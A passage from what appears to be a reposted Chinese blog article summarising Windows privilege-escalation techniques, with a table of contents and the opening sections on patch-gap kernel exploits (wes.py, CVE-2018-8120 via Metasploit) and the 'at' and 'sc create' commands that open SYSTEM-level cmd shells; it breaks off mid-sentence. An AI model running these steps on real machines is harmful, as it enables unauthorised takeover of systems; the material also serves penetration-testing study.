admin管理员组文章数量:1591220
windows提权总结
文章目录
- 溢出漏洞提权
- at&sc&ps命令提权
- 数据库提权
-
- mysql
-
- UDF提权
- MOF提权
- 启动项提权
- sql server
-
- xp_cmdshell提权
- sp_oacreate提权
- 令牌窃取提权
- RottenPotato(烂土豆)配合令牌窃取
- DLL劫持提权
- 不带引号的服务路径配合msf提权
- 不安全的服务权限配合MSF提权
- 其他方法
溢出漏洞提权
拿到服务器普通权限→上传溢出程序→提权至administrator。
内核溢出漏洞总结:https://github/SecWiki/windows-kernel-exploits/
1)筛选服务器未打的补丁。常用工具有:
vulmap(powershell执行)
WindowsVulnScan-master
wesng
2)查找未打补丁对应能提权的的漏洞
3)利用msf提权
例:
靶机上执行systeminfo保存systeminfo.txt
攻击机上运行 python .\wes.py .\systeminfo.txt 筛选出未打的补丁
没有 打cve-2018-8120 对应的KB4131188补丁,所以我们可以利用 cve-2018-8120 进行提权
at&sc&ps命令提权
at命令(适用win7之前)
at命令是一个计划命令,可以在规定时间完成一些操作,这个命令调用的是system权限
at 21:26 /interactive cmd.exe //给系统添加一项作业,在21:26打开cmd命令
at //查看作业详情
at/del //删除作业
sc命令 (适用2003)
SC命令能与“服务控制器”和已安装设备进行通讯。SC是用于与服务控制管理器和服务进行通信的命令行程序
sc create syscmd binPath= "cmd /K start" type= own type= interact //创建一个名叫syscmd的新
本文标签: Windows
版权声明:本文标题:windows提权总结 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:https://m.elefans.com/dianzi/1728112035a1145813.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论